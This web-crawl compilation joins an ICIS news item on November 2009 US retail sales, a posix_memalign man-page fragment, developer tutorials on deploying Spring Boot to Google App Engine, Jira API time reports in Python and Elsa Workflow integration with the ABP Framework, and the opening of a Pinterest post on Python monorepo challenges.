11 December 2009 17:49 [Source: ICIS news] WASHINGTON (ICIS news)--US retail and food services sales rose by 1.3% in November, the Commerce Department said on Friday, raising hopes that consumers are gaining confidence in the recovery and are willing to spend. Consumer spending is the principle driving force of the ?xml:namespace> The improvement in retail sales last month was almost twice what market analysts had been expecting. The department said that retail and food services sales were at a seasonally adjusted $352.1bn (€239.4bn) in November, an increase of 1.3% from October and nearly 2% above the retail sales level of November last year. Much of the gain in November’s retail sales was attributed to a 6% rise in gasoline sales at the pump, but as fuel prices were more or less steady in November, the sales increase suggests that consumers were more willing to travel and shop. Increased consumer spending also appeared to be reflected in a 2.8% gain in retail sales at electronics and appliances stores and a 1.5% improvement in sales of building materials and garden supplies at the retail level. Along with modest gains in retail sales at sporting goods, book and music stores and improvements in beverages and restaurant dining, the data suggest that US consumers are increasingly willing to spend on more recreational and leisure items, not just on essentials such as food, clothing and shelter. Much of the chemicals industry ultimately depends on consumer purchasing, which drives sales of such downstream chemicals-consuming products as autos, appliances, electronics, CDs and other storage media and retail product packaging. (
http://www.icis.com/Articles/2009/12/11/9318753/us-retail-sales-rise-1.3-in-nov-signal-recovery-gains.html
CC-MAIN-2013-48
en
refinedweb
#include <stdlib.h> int posix_memalign(void **memptr, size_t alignment, size_t.() , the Base Definitions volume of IEEE Std 1003.1-2001, <stdlib.h>
http://www.makelinux.net/man/3posix/P/posix_memalign
CC-MAIN-2013-48
en
refinedweb
. 1. What Is App Engine? App Engine is a cloud platform where you quickly can deploy your application without worrying too much about the infrastructure. Besides that, your application can automatically scale up and down, you can debug and monitor your application, split traffic, etc. Two types of App Engine environments exist: the standard environment and the flexible environment. Which environment to choose, depends on your application’s needs. A complete comparison of features between the two environments can be found here. You choose for the standard environment when: - you don’t mind that your application is running in a sandbox which is limited to a specific set of languages and runtime versions; - your application needs rapid scaling; - you only want to pay when your application is being used; - Pricing is based on instance hours. You choose for the flexible environment when: - you want your application to run inside Docker containers on Compute Engine virtual machines; - your application receives a constant flow of traffic and gradually needs scaling up and down; - you need to use a programming language or runtime version which is not supported by the standard environment; - you need to access resources or services of your GCP project; - you pay based on the usage of vCPU, memory and persistent disks.. 2. Deploy to Flexible Environment We will start with deployment to the flexible environment. The reason for this will become clear when we try to deploy to the standard environment. Sources being used can be found at GitHub. 2.1 Create the Application First, we need to create a Spring Boot application. We create this at start.spring.io and choose Java 1.8 and Web MVC. We choose Java 1.8 because this is the supported Java version for the standard environment and our aim is to use this same application for deployment to the standard environment without any changes. We add a HelloController which prints a Hello Google App Engine welcome message and the host where our application is running: @RestController public class HelloController { @RequestMapping("/hello") public String hello() { StringBuilder message = new StringBuilder("Hello Google App Engine!"); try { InetAddress ip = InetAddress.getLocalHost(); message.append(" From host: " + ip); } catch (UnknownHostException e) { e.printStackTrace(); } return message.toString(); } } In order to make the deployment to App Engine easier, we add the App Engine Maven Plugin to our pom: <build> <plugins> ... <plugin> <groupId>com.google.cloud.tools</groupId> <artifactId>appengine-maven-plugin</artifactId> <version>1.3.2</version> <configuration> <version>1</version> </configuration> </plugin> </plugins> </build> We also need an app.yaml file which is needed to configure your App Engine application’s settings. A complete reference for the app.yaml file can be found here. We add the following app.yaml file to directory src/main/appengine/ : runtime: java env: flex handlers: - url: /.* script: this field is required, but ignored 2.2 Create the GCP Project Now that we have created our application, it is time to turn to the Google Cloud Platform. Create a MyGoogleAppEnginePlanet project in GCP. This also shows us the project ID, which we must remember somewhere. Start the Google Cloud Shell in the browser and clone the git repository: $ git clone Enter the mygoogleappengineplanet directory and run the application: $ mvn clean spring-boot:run Our application now runs in the console and we can use web preview in order to access our hello URL: In the browser a new tab is opened to the following URL: This will show a 404 error page, because it maps to the root URL. Let’s change it to our hello URL: This will show us our welcome message, as expected: Hello Google App Engine! From host: cs-6000-devshell-vm-859e05a5-a8a3-4cd2-813f-af385740076b/172.17.0.3 2.3 Deploy to App Engine When creating an application in AppEngine, we need to choose a region where the application will be running. The list of regions can be shown by issuing the command: $ gcloud app regions list We will choose region europe-west and create our AppEngine app: $ gcloud app create --region europe-west You are creating an app for project [gentle-respect-234016]. WARNING: Creating an App Engine application for a project is irreversible and the region cannot be changed. More information about regions is at <>. Creating App Engine application in project [gentle-respect-234016] and region [europe-west]....done. Success! The app is now created. Please use `gcloud app deploy` to deploy your first app. From within our git repository directory, we can deploy our application: $ mvn -DskipTests appengine:deploy After deployment, open the browser and enter the welcome URL: This will show us the hello message again. In order to prevent extra charges against your GCP credit, you should shutdown your GCP project. 3. Deploy to Standard Environment. This causes several conflicts because Spring Boot uses an embedded Tomcat Web Server. More information about the configuration of a Spring Boot application for the standard environment can be found here. The sources for the standard environment are available in the feature/standardenv branch of our git repository. 3.1 Convert for Standard AppEngine In this section we will convert our previously created application with configuration for the flexible environment to a configuration which will be deployable to the standard environment. We need to remove the app.yaml file and we add an appengine-web.xml in directory src/main/webapp/WEB-INF with the following contents: <appengine-web-app <threadsafe>true</threadsafe> <runtime>java8</runtime> <system-properties> <property name="java.util.logging.config.file" value="WEB-INF/classes/logging.properties"/> </system-properties> </appengine-web-app> We add a SpringBootServletInitializer implementation: public class ServletInitializer extends SpringBootServletInitializer { @Override protected SpringApplicationBuilder configure(SpringApplicationBuilder application) { return application.sources(MyGoogleAppEnginePlanetApplication.class); } } The following changes are made to our pom: ... <packaging>war</packaging> ... <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-tomcat</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>javax.servlet</groupId> <artifactId>javax.servlet-api</artifactId> <scope>provided</scope> </dependency> <!-- Exclude any jul-to-slf4j --> <dependency> <groupId>org.slf4j</groupId> <artifactId>jul-to-slf4j</artifactId> <scope>provided</scope> </dependency> .. And finally, we add a logging.properties file into src/main/resources: .level = INFO 3.2 Run and Deploy In order to run the application, we need to issue the following command: $ mvn appengine:run In the logs we can clearly see that the standard environment is used: [INFO] Detected App Engine standard environment application. The URL is again accessible via the web preview, just as we did before at the flexible environment. Deployment to AppEngine is identical as for the flexible environment: $ mvn -DskipTests appengine:deploy Check the correct deployment by accessing the URL via web preview and the following response is issued: Hello Google App Engine! From host: localhost/127.0.0.1 4. Conclusion In this post we looked at GCP App Engine and how we can deploy a Spring Boot application to the standard and flexible environment. We would not advise to deploy a Spring Boot application to the standard environment because you need to convert it in order to make it run into a Jetty Web Server. You will lose some benefits of Spring Boot. This does not mean that you should never use the standard environment. Spring Boot is probably not the best technical choice for the standard environment. The flexible environment in combination with Spring Boot is easy to use. Besides that, you have the choice of choosing another runtime than Java 8 and you can keep the benefits of using a Spring Boot application. Reblogged this on HelpEzee and commented: Nice post surely will be helpful
https://mydeveloperplanet.com/2019/04/10/deploy-spring-boot-app-to-gcp-app-engine/
CC-MAIN-2022-05
en
refinedweb
In this post, we will explore the Jira Rest API. We will explain how you can use the Jira API in order to generate a user based time report. Besides that, it is a good excuse to do some Python coding. 1. Introduction A lot of companies are using Jira nowadays in order to support their Scrum or Kanban process. Add-ons can be installed for extending the functionality of Jira. Some of them are free, other ones need to be purchased. Jira is available in two versions, a Cloud version and a Server (on-premise) version. The number of add-ons for Jira Cloud is very limited and aims at smaller teams, Jira Server has many more add-ons and aims at larger organizations . The number of add-ons and whether you want to be responsible for maintenance yourself, can be decisive factors which version to use. However, both versions also support an API. It is a quite extended API and gives you the opportunity to write your own scripts extending the Jira functionality. E.g. you can create an interface between your Service Management system and Jira for passing tickets from 1st line support (working with the Service Management system) to 2nd line support (working with Jira). Enough for this introduction, let’s start using the API! We will develop a Python script which will generate a user based time report for a specific Jira project. We are using Python 3.7.5 and version 2 of the Jira API. The sources can be found at GitHub. 2. Create a Jira Cloud Account First things first, we will need a running instance of Jira in order to execute some integration tests. Go to the Jira website and navigate to the bottom of the page. We choose the free Jira Cloud plan. In the next step, you need to create an account and choose a site name. We choose the mydeveloperplanet.atlassian.net site name. Last thing to do, is to create a Scrum board and we are all set to go. It took us less than 5 minutes to get started with Jira Cloud, pretty cool, isn’t it? Create some user stories with sub-tasks, start a sprint and log some work to the sub-tasks. We can also use the Jira API to do so, but that is maybe something for another post. 3. The Jira API Since we are using Jira Cloud, we need to create an API token first. Click on your avatar in the left bottom corner and choose ‘Account settings’ . Go to the Security tab and create the API token. Now, let’s take a look at the Jira Rest API documentation: The API is well documented and contains examples how to call the API with curl, Node.js, Java, Python and PHP. The expected response of the request is also provided. So, all of the documentation is available, the main challenge is to find out which requests you need for your application. Beware that there is also documentation available for the Jira Server API. It contains less clear information than the Cloud version. Before writing a script which should support both versions, check whether the API call is identical and use the Cloud documentation if possible. Note that it is also possible to use the Python Jira library, but we preferred to talk to the Jira API directly. This way, we are independent of a third party library. 4. The Jira Time Report The requirements for the Jira time report we want to create, are the following: - The report must contain all the logged worked per user within a specified time period for a specific Jira project; - The report must be sorted by user, day and issue. For retrieving the work logs of a Jira issue, we need to call the Get issue worklogs request. This request requires an issue Id or key. Therefore, we first need to retrieve the issues which contain work logs within the specified time period. We can use the Search for issues using JQL request for that. This will give us the possibility to use the Jira Query Language (JQL), just like we can use it for searching issues in Jira itself. We are using the following query: query = { 'jql': 'project = "' + args.project + '" and timeSpent is not null and worklogDate >= "' + args.from_date + '"' + ' and worklogDate < "' + convert_to_date(args).strftime("%Y-%m-%d") + '"', 'fields': 'id,key', 'startAt': str(start_at) } The jql checks the Jira project, whether there is any time spent on this issue and at the end it checks whether work logs exists within the specified time period. The Jira project and date where to search from are given as arguments when starting the application. The from_date will have a time of 00:00:00. The convert_to_date will add one day to the to_date argument at time 00:00:00. When no to_date is given, it will be defaulted to tomorrow at time 00:00:00. The fields indicate which fields we want to receive. If not provided, all fields are returned, but we are only interested in the id and the key. The start_at parameter will indicate from which record on we want to receive the results. The results are paginated (max 50 results currently), so we will need to do something in order to request the other pages. We invoke the Jira request with the above query and load the JSON part in response_json. Remember that pagination is used, so we add the plain JSON issue results to the list which will hold all issues in line 3. We deliberately did not transform the JSON output into objects because we only need the id and key. We can always do so later on if we want to. response = get_request(args, "/rest/api/2/search", query) response_json = json.loads(response.text) issues_json.extend(response_json['issues']) Support for pagination is done in the next part. The JSON response holds the total number of issues which are returned from the query and the maximum results which are returned from the request. We read those fields from the response and then check whether the request must be invoked again with a new start_at parameter. This code and the code above are part of an endless while-loop. We break out of the loop when we processed all of the search results in line 7. total_number_of_issues = int(response_json['total']) max_results = int(response_json['maxResults']) max_number_of_issues_processed = start_at + max_results if max_number_of_issues_processed < total_number_of_issues: start_at = max_number_of_issues_processed else: break Retrieving the work logs works pretty much the same way. We retrieve the work logs of an issue and then process only the work logs which fall within the given time period. The work logs are converted to WorkLog objects. class WorkLog: def __init__(self, issue_key, started, time_spent, author): self.issue_key = issue_key self.started = started self.time_spent = time_spent self.author = author The only thing left to do is to sort the list of work logs. We use sorted for this and by means of the attrgetter we get the desired sorting. sorted_on_issue = sorted(work_logs, key=attrgetter('author', 'started', 'issue_key')) Last but not least, the sorted_on_issue list is used to format the work logs into the chosen output format, either console output, csv file or Excel file. For the latter, we used the xlsxwriter Python library. def output_to_excel(work_logs): try: workbook = xlsxwriter.Workbook(EXCEL_FILE_NAME) worksheet = workbook.add_worksheet() row = 0 for work_log in work_logs: worksheet.write(row, 0, work_log.author) worksheet.write(row, 1, work_log.started.strftime('%Y-%m-%d')) worksheet.write(row, 2, work_log.issue_key) worksheet.write(row, 3, str(timedelta(seconds=work_log.time_spent))) row += 1 finally: workbook.close() 5. Conclusion We explored the Jira API in order to generate a time report per user in a given time period for a specific Jira project. The API is well documented and quite easy to use. When searching for information about the Jira Rest API, you will be guided to the version 3 of the API. Beware that this version is currently in beta. Feel free to use the Jira time report generator and to request for any new features.
https://mydeveloperplanet.com/2020/02/12/how-to-use-the-jira-api/
CC-MAIN-2022-05
en
refinedweb
Using Elsa Workflow with ABP Framework Elsa Core is an open-source workflows library that can be used in any kind of .NET Core application. Using such a workflow library can be useful to implement business rules visually or programmatically. This article shows how we can use this workflow library within our ABP-based application. We will start with a couple of examples and then we will integrate the Elsa Dashboard (you can see it in the above gif) into our application to be able to design our workflows visually. Source Code You can find the source of the example solution used in this article here. Create the Project In this article, I will create a new startup template with EF Core as a database provider and MVC/Razor-Pages for the UI framework. If you already have a project with MVC/Razor-Pages or Blazor UI, you don't need to create a new startup template, you can directly implement the following steps to your existing project (you can skip this section). - We will create a new solution named ElsaDemo(or whatever you want). We will create a new startup template with EF Core as a database provider and MVC/Razor-Pages for the UI framework by using the ABP CLI: abp new ElsaDemo Our project boilerplate will be ready after the download is finished. Then, we can open the solution in the Visual Studio (or any other IDE). We can run the ElsaDemo.DbMigratorproject to apply migration into our database and seed initial data. After the database and initial data created, we can run the ElsaDemo.Webto see our UI working properly. Default admin username is admin and password is 1q2w3E* Let's Create The First Workflow (Console Activity) We can start with creating our first workflow. Let's get started with creating a basic hello-world workflow by using console activity. In this example, we will programmatically define a workflow definition that displays the text "Hello World from Elsa!" to the console using Elsa's Workflow Builder API and run this workflow when the application initialized. Install Packages We need to add two packages: Elsa and Elsa.Activities.Console into our ElsaDemo.Web project. We can add these two packages with the following command: dotnet add package Elsa dotnet add package Elsa.Activities.Console - After the packages installed, we can define our first workflow. To do this, create a folder named Workflows and in this folder create a class named HelloWorldConsole. using Elsa.Activities.Console; using Elsa.Builders; namespace ElsaDemo.Web.Workflows { public class HelloWorldConsole : IWorkflow { public void Build(IWorkflowBuilder builder) => builder.WriteLine("Hello World from Elsa!"); } } In here we've basically implemented the IWorkflowinterface which only has one method named Build. In this method, we can define our workflow's execution steps (activities). As you can see in the example above, we've used an activity named WriteLine, which writes a line of text to the console. Elsa Core has many pre-defined activities like that. E.g HttpEndpoint and WriteHttpResponse (we will see them both in the next section). "An activity is an atomic building block that represents a single executable step on the workflow." - Elsa Core Activity Definition - After defining our workflow, we need to define service registrations which required for the Elsa Core library to work properly. To do that, open your ElsaDemoWebModuleclass and update your ElsaDemoWebModulewith the following lines. Most of the codes are abbreviated for simplicity. using ElsaDemo.Web.Workflows; using Elsa.Services; public override void ConfigureServices(ServiceConfigurationContext context) { var hostingEnvironment = context.Services.GetHostingEnvironment(); var configuration = context.Services.GetConfiguration(); //... ConfigureElsa(context); } private void ConfigureElsa(ServiceConfigurationContext context) { context.Services.AddElsa(options => { options .AddConsoleActivities() .AddWorkflow<HelloWorldConsole>(); }); } public override void OnApplicationInitialization(ApplicationInitializationContext context) { //... var workflowRunner = context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } Here we basically, configured Elsa's services in our ConfigureServicesmethod and after that in our OnApplicationInitializationmethod we started the HelloWorldConsoleworkflow. If we run the application and examine the console outputs, we should see the message that we defined in our workflow. Creating A Workflow By Using Http Activities In this example, we will create a workflow that uses Http Activities. It will basically listen the specified route for incoming HTTP Request and writes back a simple response. Add Elsa.Activities.Http Package - To be able to use HTTP Activities we need to add Elsa(we've already added in the previous section) and Elsa.Activities.Httppackages into our web application. dotnet add package Elsa.Activities.Http - After the package installed, we can create our workflow. Let's started with creating a class named HelloWorldHttpunder Workflows folder. using System.Net; using Elsa.Activities.Http; using Elsa.Builders; namespace ElsaDemo.Web.Workflows { public class HelloWorldHttp : IWorkflow { public void Build(IWorkflowBuilder builder) { builder .HttpEndpoint("/hello-world") .WriteHttpResponse(HttpStatusCode.OK, "<h1>Hello World!</h1>", "text/html"); } } } The above workflow has two activities. The first activity HttpEndpointrepresents an HTTP endpoint, which can be invoked using an HTTP client, including a web browser. The first activity is connected to the second activity WriteHttpResponse, which returns a simple response to us. After defined the HelloWorldHttp workflow we need to define this class as workflow. So, open your ElsaDemoWebModuleand update the ConfigureElsamethod as below. private void ConfigureElsa(ServiceConfigurationContext context) { context.Services.AddElsa(options => { options .AddConsoleActivities() .AddHttpActivities() //add this line to be able to use the http activities .AddWorkflow<HelloWorldConsole>() .AddWorkflow<HelloWorldHttp>(); //workflow that we defined }); } - And add the UseHttpActivities middleware to OnApplicationInitilizationmethod of your ElsaDemoWebModuleclass. public override void OnApplicationInitialization(ApplicationInitializationContext context) { // ... app.UseAuditing(); app.UseAbpSerilogEnrichers(); app.UseHttpActivities(); //add this line app.UseConfiguredEndpoints(); var workflowRunner = context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } - If we run the application and navigate to the "/hello-world" route we should see the response message that we've defined (by using WriteHttpResponse activity) in our HelloWorldHttpworkflow. Integrate Elsa Dashboard To Application Until now we've created two workflows programmatically. But also we can create workflows visually by using Elsa's HTML5 Workflow Designer. Being able to design our workflows easily and taking advantage of HTML5 Workflow Designer we will integrate the Elsa Dashboard to our application. Install Packages - Following three packages required for Elsa Server. dotnet add package Elsa.Activities.Temporal.Quartz dotnet add package Elsa.Persistence.EntityFramework.SqlServer dotnet add package Elsa.Server.Api Also, we need to install the Elsa and Elsa.Activities.Http packages but we've already installed these packages in the previous sections. - We need to install one more package named Elsa.Designer.Components.Web. This package provides us the Elsa Dashboard component. dotnet add package Elsa.Designer.Components.Web - After the package installations completed, we need to make the necessary configurations to be able to use the Elsa Server and Elsa Dashboard. Therefore, open your ElsaDemoWebModuleclass and make the necessary changes as below. public override void ConfigureServices(ServiceConfigurationContext context) { var configuration = context.Services.GetConfiguration(); //... ConfigureElsa(context, configuration); } private void ConfigureElsa(ServiceConfigurationContext context, IConfiguration configuration) { var elsaSection = configuration.GetSection("Elsa"); context.Services.AddElsa(elsa => { elsa .UseEntityFrameworkPersistence(ef => DbContextOptionsBuilderExtensions.UseSqlServer(ef, configuration.GetConnectionString("Default"))) .AddConsoleActivities() .AddHttpActivities(elsaSection.GetSection("Server").Bind) .AddQuartzTemporalActivities() .AddJavaScriptActivities() .AddWorkflowsFrom<Startup>(); }); context.Services.AddElsaApiEndpoints(); context.Services.Configure<ApiVersioningOptions>(options => { options.UseApiBehavior = false; }); context.Services.AddCors(cors => cors.AddDefaultPolicy(policy => policy .AllowAnyHeader() .AllowAnyMethod() .AllowAnyOrigin() .WithExposedHeaders("Content-Disposition")) ); //Uncomment the below line if your abp version is lower than v4.4 to register controllers of Elsa . //See (we will no longer need to specify this line of code from v4.4) // context.Services.AddAssemblyOf<Elsa.Server.Api.Endpoints.WorkflowRegistry.Get>(); //Disable antiforgery validation for elsa Configure<AbpAntiForgeryOptions>(options => { options.AutoValidateFilter = type => type.Assembly != typeof(Elsa.Server.Api.Endpoints.WorkflowRegistry.Get).Assembly; }); } public override void OnApplicationInitialization(ApplicationInitializationContext context) { app.UseCors(); //... app.UseHttpActivities(); app.UseConfiguredEndpoints(endpoints => { endpoints.MapFallbackToPage("/_Host"); }); var workflowRunner = context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } These services required for the dashboard. We don't need to register our workflows one by one anymore. Because now we use .AddWorkflowsFrom<Startup>(), and this registers workflows on our behalf. As you may notice here, we use a section named Elsaand its sub-sections from the configuration system but we didn't define them yet. To define them open your appsettings.jsonand add the following Elsa section into this file. { //... "Elsa": { "Http": { "BaseUrl": "" } } } Define Permission For Elsa Dashboard We can define a permission to be assured of only allowed users can see the Elsa Dashboard. Open your ElsaDemoPermissionsclass under the Permissions folder (in the ElsaDemo.Application.Contractslayer) and add the following permission name. namespace ElsaDemo.Permissions { public static class ElsaDemoPermissions { public const string GroupName = "ElsaDemo"; public const string ElsaDashboard = GroupName + ".ElsaDashboard"; } } - After that, open your ElsaDemoPermissionDefinitionProviderclass and define the permission for Elsa Dashboard. using ElsaDemo.Localization; using Volo.Abp.Authorization.Permissions; using Volo.Abp.Localization; namespace ElsaDemo.Permissions { public class ElsaDemoPermissionDefinitionProvider : PermissionDefinitionProvider { public override void Define(IPermissionDefinitionContext context) { var myGroup = context.AddGroup(ElsaDemoPermissions.GroupName); myGroup.AddPermission(ElsaDemoPermissions.ElsaDashboard, L("Permission:ElsaDashboard")); } private static LocalizableString L(string name) { return LocalizableString.Create<ElsaDemoResource>(name); } } } - As you can notice, we've used a localized value (L("Permission:ElsaDashboard")) but haven't added this localization key and value to the localization file, so let's add this localization key and value. To do this, open your en.jsonfile under Localization/ElsaDemo folder (under the DomainShared layer) and add this localization key. { "culture": "en", "texts": { "Menu:Home": "Home", "Welcome": "Welcome", "LongWelcomeMessage": "Welcome to the application. This is a startup project based on the ABP framework. For more information, visit abp.io.", "Permission:ElsaDashboard": "Elsa Dashboard" } } Add Elsa Dashboard Component To Application - After those configurations, now we can add Elsa Dashboard to our application with an authorization check. To do this, create a razor page named _Host.cshtml (under Pages folder) and update its content as below. @page "/elsa" @using ElsaDemo.Permissions @using Microsoft.AspNetCore.Authorization @attribute [Authorize(ElsaDemoPermissions.ElsaDashboard)] @{ var serverUrl = $"{Request.Scheme}://{Request.Host}"; Layout = null; } <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>Elsa Workflows</title> <link rel="icon" type="image/png" sizes="32x32" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/favicon-16x16.png"> <link rel="stylesheet" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/fonts/inter/inter.css"> <link rel="stylesheet" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/elsa-workflows-studio.css"> <script src="/_content/Elsa.Designer.Components.Web/monaco-editor/min/vs/loader.js"></script> <script type="module" src="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/elsa-workflows-studio.esm.js"></script> </head> <body class="h-screen" style="background-size: 30px 30px; background-image: url(/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/tile.png); background-color: #FBFBFB;"> <elsa-studio-root <elsa-studio-dashboard></elsa-studio-dashboard> </elsa-studio-root> </body> </html> - We've defined an attribute for authorization check here. With this authorization check, only the user who has the Elsa Dashboard permission allowed to see this page. Add Elsa Dashboard Page To Main Menu - We can open the ElsaDemoMenuContributorclass under the Menus folder and define the menu item for reaching the Elsa Dashboard easily. using System.Threading.Tasks; using ElsaDemo.Localization; using ElsaDemo.MultiTenancy; using ElsaDemo.Permissions; using Volo.Abp.Identity.Web.Navigation; using Volo.Abp.SettingManagement.Web.Navigation; using Volo.Abp.TenantManagement.Web.Navigation; using Volo.Abp.UI.Navigation; namespace ElsaDemo.Web.Menus { public class ElsaDemoMenuContributor : IMenuContributor { public async Task ConfigureMenuAsync(MenuConfigurationContext context) { if (context.Menu.Name == StandardMenus.Main) { await ConfigureMainMenuAsync(context); } } private async Task ConfigureMainMenuAsync(MenuConfigurationContext context) { var administration = context.Menu.GetAdministration(); var l = context.GetLocalizer<ElsaDemoResource>(); context.Menu.Items.Insert( 0, new ApplicationMenuItem( ElsaDemoMenus.Home, l["Menu:Home"], "~/", icon: "fas fa-home", order: 0 ) ); //add Workflow menu-item context.Menu.Items.Insert( 1, new ApplicationMenuItem( ElsaDemoMenus.Home, "Workflow", "~/elsa", icon: "fas fa-code-branch", order: 1, requiredPermissionName: ElsaDemoPermissions.ElsaDashboard ) ); //... } } } - With that menu item configuration, only the user who has Elsa Dashboard permission allowed to see the defined menu item. Result - Let's run the application and see how it looks like. If the account you are logged in has the ElsaDemoPermissions.ElsaDashboard permission, you should see the Workflow menu item. If you do not see this menu item, please be assured that your logged-in account has that permission. - Now we can click the "Workflow" menu item, display the Elsa Dashboard and designing workflows. the same to you !! How to resolved ,I have tried to run elsa demo in github ,but it still so tolo 8/25/2021 8:13:07 AM Great! How to replace ElsaContext with AbpDbContext?Any good ideas? MaxRiz 7/29/2021 3:46:22 PM Great! Thanks! I was looking for a good workflow solution with abp viswajwalith 7/2/2021 5:10:50 PM We are trying to integrate elsa dashboard, it worked perfectly in Application template, but when we try to integrate in microservice based ABP solution getting following error when accessing the elsa dashboard. TypeLoadException: Could not load type 'System.Web.Security.MembershipPasswordAttribute' from assembly 'System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'. viswajwalith 6/30/2021 8:42:08 AM Thanks for the article. We implemented this in our ABP application. We can able to create workflow but when we modify workflow, we are facing error. Error: ArgumentException: A different value already has the Id '6'. Newtonsoft.Json.Utilities.BidirectionalDictionary<TFirst, TSecond>.Set(TFirst first, TSecond second) Could you provide a way to solve the error. Engincan VESKE 6/30/2021 10:31:48 AM Hi @viswajwalith, I think this is related to the Elsa Core library because there are several issues (e.g.) in the Elsa repository like you're facing. I've encountered this problem as well. I wasn't using it in production so I deleted the workflow and create the new one by exporting the previous workflow's JSON file via the designer. Vivek Koppula 6/26/2021 10:24:11 AM Thanks for the article. If you want the final elsa dashboard to be within the layout of abp, try removing the line Layout = null; from _Host.cshtml file. My _Host.cshtml file now looks like as follows. @page "elsa/workflows" @using AbpAppTmpltMvcPvt.Permissions @using Microsoft.AspNetCore.Authorization @attribute [Authorize(AbpAppTmpltMvcPvtPermissions.ElsaDashboard)] @{ var serverUrl = $"{Request.Scheme}://{Request.Host}"; //Layout = null; } .... Engincan VESKE 6/30/2021 10:33:19 AM Thanks, Vivek. Henry Chan 6/23/2021 7:56:38 AM Could you provide a way to add ABP's Authorization to the Elsa API Server ? Thanks. xx xx 6/23/2021 2:58:58 AM Thank you. but I could not understand how to use the workflow in a real world,such as apply a job request, Engincan VESKE 6/23/2021 6:24:00 AM Hi, thanks for the feedback. In this article, I just wanted to basically introduce the Elsa Workflow library and show how we can integrate the Elsa Dashboard into our ABP-based application. I may write another article about a real-time scenario in the future. You can check the Elsa Core's documentation for a real-time application, like document-approval (). behzad 6/22/2021 12:09:33 PM THIS IS AWESOME! THANK YOU Engincan VESKE 6/22/2021 12:15:15 PM Thank you. Serdar 6/22/2021 10:03:11 AM very good article. thanks. Engincan VESKE 6/22/2021 10:18:23 AM Thank you.
https://community.abp.io/articles/using-elsa-workflow-with-the-abp-framework-773siqi9
CC-MAIN-2022-05
en
refinedweb
Javascript function pattern We all know the problem lots of javascript functions and a polluted global namespace. To manage this I have built a pattern for anonymous functions as variables to use client side in an application. The basic requirement is that it is easy to stack the functions for initialisation calls and the functions within this function are effectively namespace protected from each other. I am assuming you are familiar with the basic use of an anonymous function as the value of a variable: var functionName = (() => { }) (); To this we add some initialisation management: var functionName = (() => { let initDone = false; let loadPrevious; let init = () = { if (!initDone) { initDone = true; … if (functionName.loadPrevious) functionName.loadPrevious(); }} Add a return to the function to expose internal variables: return {init: init, loadPrevious:loadPrevious) And after the function definition: functionName.loadPrevious = window.onload; window.onload = functionName.init; Replace the … with anything that needs to be done to initialise. Any asynchronous calls should have a callback function. You can sort of get some callback hell from this but there are ways to manage that (not the subject of this). Calling loadPrevious should be inside a callback function if you have async calls. Of course other functions can be defined (as variables to avoid hoisting) within the function and exposed using the return value. This simple and effective pattern has allowed us to build an extensive managed functional programming environment.
https://medium.com/@rickmarshall_57431/javascript-function-pattern-78dce6d2786
CC-MAIN-2022-05
en
refinedweb
Building a Python monorepo for fast, reliable development Suman Karumuri | Pinterest technical lead, Visibility & Ruth Grace Wong | Pinterest engineer, Core Site Reliability More than 200 million people discover and do what they love on Pinterest every month. We rely on several hundred Python services and tools to power these experiences. The code for these services lives in 100+ Git repositories (except for our Python frontend monolith). Overtime, we found that developing Python applications across a growing number of repos was causing friction and slowing down our developers. We built Python commons to provide a seamless experience for our Python developers. In this post, we’ll share a few challenges we encountered managing Python code at scale, and how Python commons provides a fast and reliable code development environment. Challenges managing Python code at scale While Python tools work great for managing code in a single repo, the tools aren’t designed for managing code across repos. Even in a single repo, there’s a steep learning curve to correctly set up and use tools and utilities, like requirements, setup.py and tox for a reproducible build and test environment. Given the complexity involved, few developers take the time to do it right. Below, we’ll explain a few issues our developers face when building, testing and deploying Python code across 100+ repos. Managing virtual environments: Each Python project has its own virtualenv, and the developer needs to be mindful of using the correct virtualenv while working in a project and branch. Using the wrong virtualenv leads to hard-to-trace errors in the development, build and deploy process. Running unit tests with tox: For test integrity, developers are advised to run their tests in a virtualenv using tox. Given the complexity of managing virtual envs and setting up tox correctly, few projects do this in practice. (Some developers skip writing unit tests entirely.) Package pinning: If packages aren’t pinned to specific versions they might break in production when their dependencies are upgraded. Even if each repo pinned the version of their packages, reusing code across repos leads to conflicting package versions and breaks the package during deployment. Deploying security fixes: Upgrading packages to fix a security issue across hundreds of repos is a hard, boring and tedious process. Pip install: Most of our developers deploy Python packages using pip install. In practice, we found pip install isn’t a robust deployment mechanism for the following reasons: - Pip install isn’t atomic. A failed pip install may leave some packages upgraded and others an old version. This occasionally causes deployment outages. - Pip can fail silently on production machines which leads to production outages. - Pip’s command line options are inconsistent across minor version changes, which can cause a pip install to fail when pip is upgraded along with new OS versions. - Pip downloads each dependency recursively. While this is harmless at small scale, doing it across tens of thousands of machines several times every day is inefficient. - Pip install wasn’t ideal for deploying internal tools because inconsistent dev environments was becoming hard to support. Most tools came with custom scripts that setup virtual envs and deployed the tool there. While this worked, it was a tedious and error-prone process. Consistent development environment: Since developers set up their own repo, over time there’s little consistency in development, build, test and deployment setups. Several projects didn’t have continuous integration setup for their build process while coding conventions and quality varied across repos. Even minor issues, like failing to correctly namespace a package, led to namespace clobbering issues when the code was reused resulting in complicated workarounds. This additional complexity discouraged code reuse across the repos. Our takeaway is the standard Python toolchain needs a lot of work upfront to create a consistent and reproducible build environment in a single repo. Even if we set up the tooling carefully, the standard tools can’t ensure a consistent build and deploy pipeline across repos. Python commons We had one primary 